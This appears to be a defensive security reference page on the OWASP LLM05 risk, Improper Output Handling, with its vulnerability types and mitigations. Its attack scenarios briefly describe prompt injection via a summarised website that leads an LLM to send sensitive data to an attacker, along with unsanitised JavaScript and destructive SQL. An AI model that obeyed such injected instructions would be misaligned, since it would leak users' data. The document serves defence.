LLM05—Improper Output Handling
>Control Description
>Vulnerability Types
- 1.Remote Code Execution: LLM output entered directly into system shell or eval functions
- 2.Cross-Site Scripting (XSS): JavaScript or Markdown generated and interpreted by browser
- 3.SQL Injection: LLM-generated queries executed without proper parameterization
- 4.Path Traversal: LLM output used to construct file paths without sanitization
- 5.Email Injection: LLM-generated content in email templates enabling phishing attacks
>Common Impacts
>Prevention & Mitigation Strategies
- 1.Treat the model as any other user with zero-trust approach and proper input validation
- 2.Follow OWASP ASVS guidelines for effective input validation and sanitization
- 3.Encode model output to mitigate undesired code execution by JavaScript or Markdown
- 4.Implement context-aware output encoding based on where LLM output will be used
- 5.Use parameterized queries or prepared statements for all database operations
- 6.Employ strict Content Security Policies (CSP) to mitigate XSS risks
- 7.Implement robust logging and monitoring to detect unusual patterns in LLM outputs
>Attack Scenarios
An application uses an LLM extension for chatbot responses. The extension also offers administrative functions. The LLM passes its response without validation, causing the extension to shut down for maintenance.
A user uses a website summarizer tool. The website includes a prompt injection instructing the LLM to capture sensitive content and send it to an attacker-controlled server.
An LLM allows users to craft SQL queries through a chat feature. A user requests a query to delete all database tables, which executes without scrutiny.
A web app uses an LLM to generate content from user prompts without sanitization. An attacker submits a crafted prompt causing the LLM to return an unsanitized JavaScript payload.
>References
Ask AI
Configure your API key to use AI features.